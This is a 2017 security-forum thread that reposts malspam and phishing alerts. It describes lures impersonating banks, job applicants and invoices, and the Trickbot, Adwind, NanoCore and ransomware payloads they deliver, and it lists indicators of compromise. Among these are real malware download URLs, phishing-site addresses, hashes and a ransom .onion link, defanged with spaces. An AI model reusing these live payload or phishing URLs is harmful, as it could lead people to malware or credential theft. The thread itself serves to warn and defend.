Fake 'Resume' SPAM - delivers malware
- https://myonlinesecurity.co.uk/fake-resume-emails-continue-to-deliver-malware/
10 Nov 2017 - "... This is a continuation from these 2 previous posts about malware using resumes or job applications as the lure [1] [2]...
1] https://myonlinesecurity.co.uk/website-job-application-fake-resume-delivers-globe-ransomware/
2] https://myonlinesecurity.co.uk/spear-phishing-fake-resume-malspam-leads-to-malware/
... you can see from the email headers, these pass all authentication checks, so stand quite a good chance of being delivered to a recipient... the web address the word doc downloads from
http ://89.248.169.136 /bigmac.jpg is exactly the same as reported on 8th October 2107. More than 1 month ago & still live and spewing out malware...
Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/11/resume_amir.png
resume.doc - Current Virus total detections 11/59*. Payload Security**...
This malware downloads from http ://89.248.169.136 /bigmac.jpg which of course it -not- an image file but a renamed .exe ASDlkoa.exe (VirusTotal 18/67[3]) (Payload Security[4])... This word doc looks like this:
> https://myonlinesecurity.co.uk/wp-content/uploads/2017/10/resume_doc.png
... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/0af97621951ce1fc64f8d1d7c6122aabba73ea0e6c90acb2e51c7f3f4c658f44/analysis/1510290607/
resume.doc
** https://www.hybrid-analysis.com/sample/0af97621951ce1fc64f8d1d7c6122aabba73ea0e6c90acb2e51c7f3f4c658f44?environmentId=100
Hybrid Analysis
89.248.169.136: https://www.virustotal.com/en/ip-address/89.248.169.136/information/
> https://www.virustotal.com/en/url/880e2bbcd2a5e019f843cb714639b8382c5ad781f182ea7afa5556f7262f8f9e/analysis/
3] https://www.virustotal.com/en/file/43ade0732b103beef40c9c65dfe7854c5b29ff274fc8d5bfe954a2564f4d6396/analysis/1510290556/
ASDlkoa.exe
4] https://www.hybrid-analysis.com/sample/43ade0732b103beef40c9c65dfe7854c5b29ff274fc8d5bfe954a2564f4d6396?environmentId=100
DNS Requests
145.249.104.14
212.227.91.231
Contacted Hosts
212.227.91.231
145.249.104.14
104.16.40.2
216.58.201.228
216.58.201.238
___
Fake 'MoneyGram' SPAM - Java Adwind delivered
- https://myonlinesecurity.co.uk/java-adwind-delivered-via-fake-moneygram-notice-again/
10 Nov 2017 - "... mentioned many of these HERE[1]. We have been seeing these sort of emails almost every day and there was nothing much to update. Today’s has a slightly different subject and email content to previous ones. Many Antiviruses on Virus Total normally detect these heuristically...
1] https://myonlinesecurity.co.uk/?s=java+adwind
Make Note: JavaAdwind/JavaJacksbot are both very dangerous remote access backdoor Trojans...
Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/11/Moneygram-Notice-1110_2017.png
There is -no-attachment- with this malspam campaign, but instead a -link- that activates when you click the image in the email, which downloads
http ://ferraniguillem .com/MG%20Notice%201110.zip which is NOT a .zip but a .rar file. It will not extract until you -rename- it to rar and then only in WinZip -not- in any other of my extraction tools... eventually extracts to:
MG Notice 1110.JAR (532kb) Current Virus total detections 15/58*. Payload Security**...
The basic rule is NEVER open any attachment or link in an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/2367b6471df8adc26dfb902e3f0c1b45998a0e0dbb28d22b56e1ca2c421181f3/analysis/1510301644/
MG Notice 1110.JAR
** https://www.hybrid-analysis.com/sample/2367b6471df8adc26dfb902e3f0c1b45998a0e0dbb28d22b56e1ca2c421181f3?environmentId=100
ferraniguillem .com: 82.98.139.51: https://www.virustotal.com/en/ip-address/82.98.139.51/information/
> https://www.virustotal.com/en/url/0317cb29f4301f3fed3562109236bbcd4d08da6260b8d01f4595a9279c49b12d/analysis/
___
Fidelity Investments – Phish...
- https://myonlinesecurity.co.uk/fake-fidelity-investments-important-security-notice-phishing/
10 Nov 2017 - "... one we don’t often see in the UK. Fidelity Investments is a US based bank or institution...
Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/11/fidelity_phishing-scam-email.png
If you follow the link-in-the-email
http ://www.meyvesebze .net/wp-content/plugins/p.php which -redirects- you to
https ://www.todentists .ca/Site/styles/RtlCust/IdentifyUser/login.php?cmd=login_submit&id=e992ab62da234424f3975ad9356b4929e992ab62da234424f3975ad9356b4929&session=e992ab62da234424f3975ad9356b4929e992ab62da234424f3975ad9356b4929
... you see a webpage looking like this:
> https://myonlinesecurity.co.uk/wp-content/uploads/2017/11/to_dentists_fidelity_phishing.png
After you input your User Name and Password, you get forwarded to a page asking for Social security number, Date of Birth, Email Address and Email Password:
> https://myonlinesecurity.co.uk/wp-content/uploads/2017/11/to_dentists_fidelity_phishing2.png
Then you get a failure page saying “Due to a technical error, the update system is temporarily unavailable. We apologize for the inconvenience. Please try again later”:
> https://myonlinesecurity.co.uk/wp-content/uploads/2017/11/to_dentists_fidelity_phishing3.png
... Watch for -any- site that invites you to enter ANY personal or financial information... All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... Email Headers and phishing Site information: the From address in the email does-not-exist and is totally made up..."
meyvesebze .net: 31.186.8.167: https://www.virustotal.com/en/ip-address/31.186.8.167/information/
todentists .ca: 64.118.86.45: https://www.virustotal.com/en/ip-address/64.118.86.45/information/
:fear::fear: :mad:
AplusWebMaster
2017-11-13, 14:52
FYI...
Fake 'Sage invoice' SPAM - delivers Trickbot
- https://myonlinesecurity.co.uk/fake-sage-invoices-continue-to-deliver-trickbot-banking-trojan/
13 Nov 2017 - "An email with the subject of 'Important: Outdated Invoice' pretending to come from Sage but actually coming from a look-a-like or typo-squatted domain <secure@ sage-invoices .com> with a malicious word doc attachment... delivering Trickbot banking Trojan... Today’s example of the spoofed domains are, as usual, registered via Godaddy as registrar.
sage-invoices .com hosted on 185.2.81.187 | 213.152.162.139 | 185.106.121.134 |
Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/11/sage-important-outdated-invoice.png
SecureMessage.doc - Current Virus total detections 2/60*. Payload Security**...
This malware file downloads from
http ://styleof .co.uk/ser1113.png which of course is -not- an image file but a renamed .exe file that gets renamed to yjgeidqce.exe (VirusTotal 11/66***)
An alternative download location is
http ://rifweb .co.uk/ser1113.png
This email attachment contains a genuine word doc with a macro script that when run will infect you.
The word doc looks like:
> https://myonlinesecurity.co.uk/wp-content/uploads/2017/11/76sagepay_doc.png
... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/345f2734e5d25a5ccee9c52b61d3a815125db501bd187d9772fadfb0c2dc1f92/analysis/
76SagePay.doc
** https://www.hybrid-analysis.com/sample/345f2734e5d25a5ccee9c52b61d3a815125db501bd187d9772fadfb0c2dc1f92?environmentId=100
DNS Requests
127.0.0.2
79.171.39.110
146.255.36.1
127.0.0.4
Contacted Hosts
79.171.39.110
217.194.212.248
146.255.36.1
179.43.160.50
194.87.238.194
216.177.130.203
*** https://www.virustotal.com/en/file/2afef18845aa3c1a76f74b1c9ac35e93e93e79c584b6a87e5204608f2d2c05a8/analysis/1510574768/
ser1113.png
styleof .co.uk: 79.171.39.110: https://www.virustotal.com/en/ip-address/79.171.39.110/information/
> https://www.virustotal.com/en/url/471e77862ec045236f8d2d3eec3faf89a608126b8e150310d44f08cbe380bbc8/analysis/
rifweb .co.uk: 217.194.212.248: https://www.virustotal.com/en/ip-address/217.194.212.248/information/
> https://www.virustotal.com/en/url/147f0c6edd137ffbce46719ab6b13aa40653273ded7b5c9350f56a3810bc3ea5/analysis/
:fear::fear: :mad:
AplusWebMaster
2017-11-14, 12:41
FYI...
Fake 'Secure email' SPAM - delivers Trickbot
- https://myonlinesecurity.co.uk/trickbot-still-delivered-by-fake-lloyds-bank-important-confidential-documents-malspam/
14 Nov 2017 - "An email with the subject of 'Secure email message' pretending to come from Lloyds Bank but actually coming from... look-a-like or typo-squatting domains and email addresses <secure@ lloydsconfidential .com>
or <secure@ lloydsbankdocs .com> or <secure@ lloydsbankconfidential .com> with a malicious word doc attachment is today’s latest -spoof- of a well-known company, bank or public authority delivering Trickbot banking Trojan...
Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/11/Important-Confidential-documents-Lloyds-Bank.png
Despite the instructions in the email to use the Authorisation code in the word doc, there is nowhere to enter it and it is not needed. The criminals are relying on you being fooled by this simple Social Engineering trick persuading you to enable Macros and content to infect you & steal your Money, Passwords and Bank details.
They tell you ”Note: Contents of this document are protected and secured. If you have problems viewing/loading secure content, please select “Enable Content” button.”
Do -NOT- enable Macros or Content under any circumstances. That will infect you...
Today’s example of the -spoofed- domains are, as usual, registered via Godaddy as registrar.
lloydsconfidential .com hosted on and sending emails via 185.106.121.78
free.hostsailor .com AS60117 Host Sailor Ltd.
lloydsbankconfidential .com hosted on and sending emails via 95.211.104.108 hosted-by.swiftslots .com
AS60781 LeaseWeb Netherlands B.V.
lloydsbankdocs .com hosted on and sending emails via 134.19.180.151 134191801511.onlinemarketmix .com AS49453 Global Layer B.V.
doc1_46.doc - Current Virus total detections 3/59*. Payload Security**...
This malware file downloads from
http ://simplicitybystrasser .com/images/logo.png which of course is -not- an image file but a renamed .exe file that gets renamed to a .exe file. (VirusTotal 9/68***).
An alternative download location is
http ://lhelectrique .com/logo.png
This email attachment contains a genuine word doc with a macro script that when run will infect you.
The word doc looks like:
> https://myonlinesecurity.co.uk/wp-content/uploads/2017/11/doc1_46_doc.png
DO NOT follow the advice they give to enable macros or enable editing to see the content..."
* https://www.virustotal.com/en/file/de17dfbad569dac86a952b993f3df27d993e991f5189af002c883103d94d8b9e/analysis/1510661006/
doc1_46.doc
** https://www.hybrid-analysis.com/sample/de17dfbad569dac86a952b993f3df27d993e991f5189af002c883103d94d8b9e?environmentId=100
DNS Requests
216.239.36.21
23.235.209.96
Contacted Hosts
23.235.209.96
216.239.36.21
92.63.107.222
91.211.247.94
*** https://www.virustotal.com/en/file/4cd32733722c4f8fa7993fb6bc997c8dbd1129678c427579774c99bef668e952/analysis/
logo.png
simplicitybystrasser .com: 23.235.209.96: https://www.virustotal.com/en/ip-address/23.235.209.96/information/
> https://www.virustotal.com/en/url/f4699e6adac225e3f9c87b12629d4e8fa1da929cbe6a6ced8d6830be4a365de7/analysis/
lhelectrique .com: 173.209.38.131: https://www.virustotal.com/en/ip-address/173.209.38.131/information/
> https://www.virustotal.com/en/url/3a438ad85528c1313c921cb3805b9cfbd7ba61de1b01de087826b8c758ee7a81/analysis/
___
Fake 'Bank login' - Phish...
- https://myonlinesecurity.co.uk/fake-halifax-we-noticed-an-attempt-to-sign-in-to-your-account-phishing/
14 Nov 2017 - "... phishing attempts for Bank login details. This one is actually quite effective when you get to the site. As you can see from the screenshots, it is very easy to be fooled by the
http ://www.halifax-online .co.uk.personal.logon.login.jsp at the start on the URL in the browser address bar
(Highlighted in Yellow) where the real web address you are sent to is lifextension .ro (Highlighted in Green)...
Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/11/halifax_phish_email_14_nov_2017.png
... If you follow the-link-inside-the-email you first get sent to
https ://superjasa .com/wp-admin/js/widgets/x86x.php which immediately redirects you to
http ://www.halifax-online .co.uk.personal.logon.login.jsp.1510638768542.lifextension .ro/RT28JASHHDAS02/Login.php?sslchannel=true&sessionid=WR3WM0KHcrFBC45ugtRa7iFomyQGXFz5fraRrou3vd4QceX3svWxy82f4JzNRFdeGOjHnwfj5iI0UJ2T
where you see a webpage looking like this:
> https://myonlinesecurity.co.uk/wp-content/uploads/2017/11/halifax_phish_site_lifextension.ro_.png
... Both sites involved in this phish are likely to be -compromised- sites, being used without the website owners knowledge
http ://lifextension .ro - 76.72.173.69: https://www.virustotal.com/en/ip-address/76.72.173.69/information/
There is a message on the home page for lifextension .ro warning that the hosting agreement for this page has expired! but the hosts/resellers have only put that on the home page -not- on any subdomains so the phish stays active... the DCM software “company” is a webdesigner and hosting reseller, who aren’t taking security of their client’s sites seriously enough. By the layout and design of their own website they must think of style over substance and mistakes and errors don’t matter (various missing & broken links, including social media buttons going nowhere):
- https://myonlinesecurity.co.uk/wp-content/uploads/2017/11/lifextension_ro.png
> https://www.virustotal.com/en/url/313cfe502aaf5f0f1cde386bb41d08723ea2b437aabcb3918ae9245155fdca0b/analysis/
Has a malware prompt on its home page, luckily the file is hosted-on-Dropbox & no longer available for download.
superjasa .com: 202.52.146.30: https://www.virustotal.com/en/ip-address/202.52.146.30/information/
:fear::fear: :mad:
AplusWebMaster
2017-11-15, 16:20
FYI...
Fake 'Bankline' SPAM - delivers Trickbot
- https://myonlinesecurity.co.uk/fake-bankline-you-have-a-new-secure-message-spam-delivers-trickbot-banking-trojan/
15 Nov 2017 - "An email with the subject of 'You have a new secure message' pretending to come from Bankline but actually coming from a look-a-like or typo-squatting domain <message@ banklinemail .com> with a link-in-the-email body to download a malicious word doc attachment is today’s latest spoof of a well-known company, bank or public authority delivering Trickbot banking Trojan
Today The Trickbot delivery method has changed somewhat. First, they have a link-in-the-email body to download a word doc. Next they have gone with a generic Bankline sender and domain. There are several banks using the Bankline name, including RBS (Royal Bank of Scotland), NatWest, Ulster Bank and a Bitcoin-Bank-Account called Bankline... no idea which one they trying to imitate today but it cleverly covers all of them & spreads the net wider than usual. There is also only 1 download location for the Trickbot payload today, they normally have 2. It looks like they have messed up the PowerShell script that gets created by the macro and the 2nd url isn’t being formed correctly...
Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/11/bankline-new-secure-message.png
Today’s example of the spoofed domains are, as usual, registered via Godaddy as registrar.
banklinemail .com hosted on 160.153.129.238 Godaddy AS26496 but also sending emails via 185.106.121.234 | 95.211.104.113 | 46.21.144.11 | 134.19.180.163 | all of which pass authentication and have correct records set.
Despite the instructions in the email to use the Authorisation code in the word doc, there is nowhere to enter it and it is not needed. The criminals are relying on you being fooled by this simple Social Engineering trick persuading you to 'enable Macros' and content to infect you & steal your Money, Passwords and Bank details.
They tell you Note: Contents of this document are protected and secured. If you have problems viewing/loading secure content, please select “Enable Content” button.
Do NOT enable Macros or Content under any circumstances. That will infect you.
8d6ba737-775e8bdc-f95f16f3-1b460259.doc - Current Virus total detections 2/59*. Payload Security**..
This malware file downloads from
http ://aperhu .com/ser111517.png which of course is -not- an image file but a renamed .exe file that gets renamed to tdhq.exe (VirusTotal 11/59***).
This email attachment contains a genuine word doc with a macro script that when run will infect you.
The word doc looks like:
> https://myonlinesecurity.co.uk/wp-content/uploads/2017/11/8d6ba737-775e8bdc-f95f16f3-1b460259_doc.png
... DO NOT follow the advice they give to enable macros or enable editing to see the content..."
* https://www.virustotal.com/en/file/5da72367078fdea770d0df1975f52432439bd760c8395f44ed31e9f4e65ea6dc/analysis/1510740562/
Secure Message.doc
** https://www.hybrid-analysis.com/sample/5da72367078fdea770d0df1975f52432439bd760c8395f44ed31e9f4e65ea6dc?environmentId=100
DNS Requests
127.0.0.2
127.0.0.4
78.47.139.102
143.95.252.46
Contacted Hosts
143.95.252.46
78.47.139.102
92.63.97.68
194.87.110.139
*** https://virustotal.com/en/file/efa4fdfa1a1df3ae13aa352ec1d6fdc1b6c000790a5dc5a2700469bf5af57e8d/analysis/
ser111517.png
aperhu .com: 143.95.252.46: https://www.virustotal.com/en/ip-address/143.95.252.46/information/
> https://www.virustotal.com/en/url/9227e8a7b041b317b7abd39fc7e297413188e4e9f2cd732e65b89a34eda17e8c/analysis/
___
Android Trojan malware discovered in Google Play
- https://blog.malwarebytes.com/cybercrime/2017/11/new-trojan-malware-discovered-google-play/
Nov 14, 2017 - "A new piece of mobile malware has been discovered in Google Play masquerading as multiple apps: an alarm clock app, a QR scanner app, a compass app, a photo editor app, an Internet speed test app, and a file explorer app. According to Google Play data, all were last updated between October and November 2017. These dates are likely when they were added to Google Play, based on their low version numbers (e.g. 1.0, 1.0.1). We named this new malware variant Android/Trojan.AsiaHitGroup based on a URL found within the code of these malicious APKs...
this QR scanner is short lived. You only get one chance to use the app, because after clicking out of it, the icon disappears! Out of frustration, you may immediately go to your apps list to uninstall this bizarre-behaving QR scanner, but good luck finding it... there appears to be no fail-proof way to stop malware from entering the Play store. This is where a second layer of protection is strongly recommended. By using a quality mobile anti-malware scanner, you can stay safe even when Google Play Protect fails..."
(More detail at the malwarebytes URL above.)
> https://www.helpnetsecurity.com/2017/11/16/malware-downloader-google-play/
Nov 16, 2017 - "Google has removed from Google Play eight apps that have served as downloaders for Android banking malware..."
:fear::fear: :mad:
AplusWebMaster
2017-11-16, 15:39
FYI...
Suspicious Domains Tracking ...
- https://isc.sans.edu/diary/rss/23046
2017-11-16 - "Domain names remain a gold mine to investigate security incidents or to prevent some malicious activity to occur on your network...
Happy hunting!
[1] https://isc.sans.edu/suspicious_domains.html
[2] https://en.wikipedia.org/wiki/Domain_generation_algorithm
[3] http://securityaffairs.co/wordpress/59072/cyber-crime/wannacry-ransomware-kill-switch.html
[4] http://misp-project.org/
[5] https://blog.rootshell.be/2017/10/31/splunk-custom-search-command-searching-misp-iocs/ "
(MUCH more detail at the isc URL above.)
:2thumb:
___
Fake 'Re:payment' SPAM - delivers malware
- https://myonlinesecurity.co.uk/fake-confirm-receipt-of-payment-malspam-delivers-malware/
16 Nov 2017 - "An email with the subject of 'Re:payment' coming from [redacted]@ cs .com with a zip attachment which contains some sort of malware...
Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/11/payment_cs_com.png
Bank receipt pdf.zip: Extracts to: Bank receipt pdf.exe - Current Virus total detections 15.68*. Hybrid Analysis**...
This malware file attempts to download from these -3- sites:
http ://www.plasticbags .info/na/?id=ct7EX847F+fIn3VkER7xV/XU/exdWHV6LvmrngXmar4Pbag2la+n0AnpQnxVHV21Mp6i4Q==&Lv18=bLUdWtwp4bJhJP -or-
http ://www.nettopolis .email/na/?id=DetlfAibiVhB/jSD5CdGOk3sftJHeNpzwT01DHDpstch9neoK+a+bAVv0IXcSJ5QPSyr6g==&Lv18=bLUdWtwp4bJhJP
-both- of which fail to respond. Both sites are hosted on Godaddy (184.168.221.53) and have a temporary holding / domain parking page with the usual adverts. Both sites were registered in early September 2017. Either Godaddy has exploitable vulnerabilities on their Domain Parking pages or they were registered by criminals who haven’t set up the domains properly yet.
http ://www.marlow-and-co .com/na/?id=mLSZLOZGg8XOoWhtThKSW1hFX7QHeHYwxlPs7+FwgoIusw3OZOrPJE6119RFPiuJf6vG8Q==&Lv18=bLUdWtwp4bJhJP&sql=1
which is hosted in Japan (183.90.253.3) and gives a 404...
The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/7ce1b57fd10cbd38bb791fa6c9ef4d1f6b5d2beffcc9131385ef87552f863a97/analysis/1510806654/
** https://www.hybrid-analysis.com/sample/7ce1b57fd10cbd38bb791fa6c9ef4d1f6b5d2beffcc9131385ef87552f863a97?environmentId=100
File Details
Bank receipt pdf.exe
DNS Requests
No relevant DNS requests were made.
Contacted Hosts
No relevant hosts were contacted...
plasticbags .info: 50.63.202.62: https://www.virustotal.com/en/ip-address/50.63.202.62/information/
nettopolis .email: 184.168.221.53: https://www.virustotal.com/en/ip-address/184.168.221.53/information/
marlow-and-co .com: 183.90.253.3: https://www.virustotal.com/en/ip-address/183.90.253.3/information/
___
Fake 'Confidential account documents' SPAM - delivers Trickbot
- https://myonlinesecurity.co.uk/fake-barclays-confidential-account-documents-malspam-delivers-trickbot-banking-trojan/
16 Nov 2017 - "An email with the subject of 'Confidential account documents' pretending to come from Barclays Bank but actually coming from a look-a-like or typo-squatted domain <secure@ barclaysdocuments .com> with a malicious word doc attachment is today’s latest spoof of a well-known company, bank or public authority delivering Trickbot banking Trojan. The attachment has random numbers protected**.doc ...
Today’s example of the spoofed domains are, as usual, registered via Godaddy as registrar.
barclaysdocuments .com hosted on and emails sent via 134.19.180.171 | 94.100.21.212 | 185.117.74.216 | 94.75.219.142 |
Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/11/barclays-confidential-account-documents.png
Protected80.doc - Current Virus total detections 5/55*. Payload Security**...
This malware file downloads from
http ://simplicitybystrasser .com/images/ser.png which of course is -not- an image file but a renamed .exe file that gets renamed to Aqv6.exe (VirusTotal 10/68***).
This email attachment contains a genuine word doc with a macro script that when run will infect you.
The word doc looks like:
> https://myonlinesecurity.co.uk/wp-content/uploads/2017/11/protected80_doc.png
... You -cannot- enter the password because that is an-image of a password-entry-box and they hope you will enable the macros (DON'T) ... and get infected...
DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/406047bbbad09cafeb623eb2c1057441ae6db7f19f630acf9a02f9c48e7f40a7/analysis/1493724795/
SecureMessage.doc
** https://www.hybrid-analysis.com/sample/406047bbbad09cafeb623eb2c1057441ae6db7f19f630acf9a02f9c48e7f40a7?environmentId=100
DNS Requests
216.138.226.110
50.19.97.123
Contacted Hosts
216.138.226.110
50.19.97.123
186.208.111.188
82.146.94.86
*** https://www.virustotal.com/en/file/a3f31216ce813cafc0288bd53bcdd68919f87e6f3ff354e40c1ea4169ef3183a/analysis/1510840036/
Aqv6.exe
simplicitybystrasser .com: 23.235.209.96: https://www.virustotal.com/en/ip-address/23.235.209.96/information/
> https://www.virustotal.com/en/url/86af85c833e2b8437de460e1b255e8cc54431f9312a3290c81f6608713ffb00f/analysis/
:fear::fear: :mad:
AplusWebMaster
2017-11-17, 15:18
FYI...
Fake 'Product Enquiry' SPAM - delivers Nanocore RAT
- https://myonlinesecurity.co.uk/fake-product-enquiry-malspam-delivers-nanocore-rat/
17 Nov 2017 - "An email with the subject of 'Product Enquiry' pretending to come from Robert Osuna Sales <roberto. osuna76@mail .com> with a malicious Excel XLS spreadsheet attachment delivers NanoCore Remote Access Trojan...
Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/11/osuna_product_enquiry.png
These are actually coming via an automated mailing service based in Russia, who despite sending malware are complying with the various anti-spam laws worldwide by having an unsubscribe link in the email body. I do not recommend to use the -unsubscribe- link. That is an almost guaranteed way to get your email address added to a load more spam and malware lists. The blurry image in the XLS spreadsheet is a Social Engineering trick to persuade you to enable editing & content (macros) so they can infect you.
DO NOT enable Editing or Content (macros) under any circumstances:
> https://myonlinesecurity.co.uk/wp-content/uploads/2017/11/product-enquiry_xls.png
Product Enquiry.xls - Current Virus total detections 14/61*. Hybrid Analysis**...
This malware downloads from
http ://cryptovoip .in/awedfs/DDF_outputCEAA78F.exe (VirusTotal 18/68[3]) (Hybrid Analysis[4])...
Email Headers and malware sites details:
191.96.249.92 - smtp4.digitalsearchengine .in - Moscow...
balajipacker .com registered 27/09/2017 using Godaddy as registrar hosted on 191.96.249.92
cryptovoip .in 103.21.58.122 Probably a hacked compromised server not knowingly involved in hosting the malware payload...
DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/d312c9226bc8558424c9fcc69d12c4b4e72a9dd67a961196b752bf231d9aa69d/analysis/1510851227/
** https://www.hybrid-analysis.com/sample/d312c9226bc8558424c9fcc69d12c4b4e72a9dd67a961196b752bf231d9aa69d?environmentId=100
DNS Requests
181.215.247.234
103.21.58.122
Contacted Hosts
103.21.58.122
201.174.233.241
181.215.247.234
3] https://www.virustotal.com/en/file/c62495a039a7973429e0d9181ae45eb231832026cd6bde1251ace42f6764ec68/analysis/1510899976/
DDF_outputCEAA78F[1].exe
4] https://www.hybrid-analysis.com/sample/c62495a039a7973429e0d9181ae45eb231832026cd6bde1251ace42f6764ec68?environmentId=100
DNS Requests
181.215.247.234
Contacted Hosts
201.174.233.241
181.215.247.234
digitalsearchengine .in: A temporary error occurred during the lookup...
cryptovoip .in: 103.21.58.122: https://www.virustotal.com/en/ip-address/103.21.58.122/information/
> https://www.virustotal.com/en/url/23dff62bba1329ede8b853a6961ccca03327c9e871100f58a5dc102ebfad702a/analysis/
:fear::fear: :mad:
AplusWebMaster
2017-11-23, 15:31
FYI...
Fake 'scanned from' SPAM - delivers Ransomware
- https://myonlinesecurity.co.uk/necurs-botnet-malspam-delivering-a-new-ransomware-via-fake-scanner-copier-messages/
23 Nov 2017 - "... It is almost as if they have timed the new version to spam out on Thanksgiving day in USA, where the AV companies and security teams are off on their long weekend holiday... downloaders from the Necurs botnet... an email with the subject of 'scanned from (printer or scanner name)' pretending to come from copier@ your own email address or company domain... definitely ransomware but doesn’t look like Locky. The ransom note is very different. These all have -blank- email bodies with just an attachment and the subject...
Update I am being told it is Scarab Ransomware... The new ransom note is called 'IF YOU WANT TO GET ALL YOUR FILES BACK, PLEASE READ THIS.TXT'... The subjects in this vary but are all copier or scanner related:
Scanned from Lexmark
Scanned from HP
Scanned from Canon
Scanned from Epson
P_rek.zip: Extracts to: image2017-11-22-5864621.vbs - Current Virus total detections 4/57*. Hybrid Analysis**
| Anyrun Beta[3] | Joesecurity[/4] |
This downloads from (in this example, there will be -dozens- of other download sites)
http ://pamplonarecados .com/JHgd476? (VirusTotal 8/66[5])
One of the emails looks like:
From: copier@ victimsdomain .com
Date: Thu 23/11/2017 06:28
Subject: Scanned from HP
Attachment: image2017-11-23-4360760.7z
Body content:
EMPTY
The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/e6715117fd6995fafe48a3a60a2b1275ef21a63f7878de2cc031c8f1a0e5d771/analysis/1511423196/
image2017-11-22-5864621.vbs
** https://www.hybrid-analysis.com/sample/e6715117fd6995fafe48a3a60a2b1275ef21a63f7878de2cc031c8f1a0e5d771?environmentId=100
DNS Requests
5.2.88.79
88.99.66.31
Contacted Hosts
5.2.88.79
88.99.66.31
3] https://app.any.run/tasks/839d4f49-13ab-4bcb-a8c6-8aead1ea33a8
4] https://jbxcloud.joesecurity.org/analysis/445266/1/html
5] https://www.virustotal.com/en/file/41ca1baf59e457aa07b29f3f7033350d6c3aed3c397aa28128ed05a27e1eb6ac/analysis/1511422910/
JHgd476
pamplonarecados .com: 5.2.88.79: https://www.virustotal.com/en/ip-address/5.2.88.79/information/
> https://www.virustotal.com/en/url/231a8217a6cd8900827411d4e3984979acea9a1441de76e9576eb603b49f655f/analysis/
:fear::fear: :mad:
AplusWebMaster
2017-11-30, 15:42
FYI...
Fake 'Invoice' SPAM - delivers ransomware
- https://myonlinesecurity.co.uk/necurs-botnet-malspamming-globeimposter-ransomware-via-fake-invoices/
30 Nov 2017 - "... from the Necurs botnet... an email with an -empty- body with the subject of 'FL-610025 11.30.2017' (random numbers) pretending to come from 'Invoicing' @ random email addresses. Today it is Globeimposter -not- Locky ransomware being delivered via this malspam campaign from the Necurs botnet...
One of the emails looks like:
From: Invoicing <Invoicing@random company >
Date: Thu 30/11/2017 09:18
Subject: FL-610025 11.30.2017
Attachment: FL-610025 11.30.2017.7z
Body content: Completely empty
FL-610025 11.30.2017.7z: Extracts to: FL-432927.vbs - Current Virus total detections 9/60*. Hybrid Analysis**...
Downloads from
http ://datenhaus .info/JHGcd476334? (as usual there will be dozens of different download sites - (VirusTotal 10/66[3])... Other download sites that I have been notified about:
mh-service .ru/JHGcd476334?
awholeblueworld .com/JHGcd476334?
... The ransom payment link is to
http ://n224ezvhg4sgyamb .onion/sup .php where you see a pretty bland page giving this link to make enquiries... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/bdbc8b31f44e8041dbd2e3eb579aeea61d35e1db95c339ddf67eca8549ea9d53/analysis/1512033616/
FL-432927.vbs
** https://www.hybrid-analysis.com/sample/bdbc8b31f44e8041dbd2e3eb579aeea61d35e1db95c339ddf67eca8549ea9d53?environmentId=100
DNS Requests
85.214.205.231
Contacted Hosts
85.214.205.231
3] https://www.virustotal.com/en/file/7bc1c0b67e76b761128ffc478554858a09aa6e5fbb7e57f1f58b3066f6c228fc/analysis/1512033503/
d4ddf8bf.exe
datenhaus .info: 85.214.205.231: https://www.virustotal.com/en/ip-address/85.214.205.231/information/
> https://www.virustotal.com/en/url/1b0845e23f71a3ff58494375bd5e7de334d405f72fc431fbfefb84a14913abcf/analysis/
mh-service .ru: 89.253.235.118: https://www.virustotal.com/en/ip-address/89.253.235.118/information/
> https://www.virustotal.com/en/url/fa9f6060289635707862505fdd206a19f0998334e48152de337e7db4e6d9725b/analysis/
awholeblueworld .com: 66.36.173.215: https://www.virustotal.com/en/ip-address/66.36.173.215/information/
> https://www.virustotal.com/en/url/76bde6cbbaa7773beb1b15ebbe5fe618fa99a7ce520c76dd392a6e1eb50f30eb/analysis/
___
Persistent drive-by cryptomining...
- https://blog.malwarebytes.com/cybercrime/2017/11/persistent-drive-by-cryptomining-coming-to-a-browser-near-you/
Nov 29, 2017 - "... we are witnessing more and more cases of abuse involving the infamous 'Coinhive' service that allows websites to use their visitors to mine the Monero cryptocurrency. Servers continue to get hacked with mining code, and plugins get hijacked and affect hundreds or even thousands of sites at once... we have come across a technique that allows dubious website owners or attackers that have compromised sites to keep mining for Monero even after the browser window is closed. Our tests were conducted using the latest version of the Google Chrome browser. Results may vary with other browsers. What we observed was the following:
A user visits a website, which silently loads cryptomining code.
CPU activity rises but is not maxed out.
The user leaves the site and closes the Chrome window.
CPU activity remains higher than normal as cryptomining continues:
> https://blog.malwarebytes.com/wp-content/uploads/2017/11/hidden_mining.gif
The trick is that although the visible browser windows are closed, there is a hidden one that remains opened. This is due to a 'pop-under' which is sized to fit right under the taskbar and hides behind the clock. The hidden window’s coordinates will vary based on each user’s screen resolution... If your Windows theme allows for taskbar transparency, you can catch a glimpse of the rogue window. Otherwise, to expose it you can simply resize the taskbar and it will magically pop it back up:
> https://blog.malwarebytes.com/wp-content/uploads/2017/11/os_compare.png
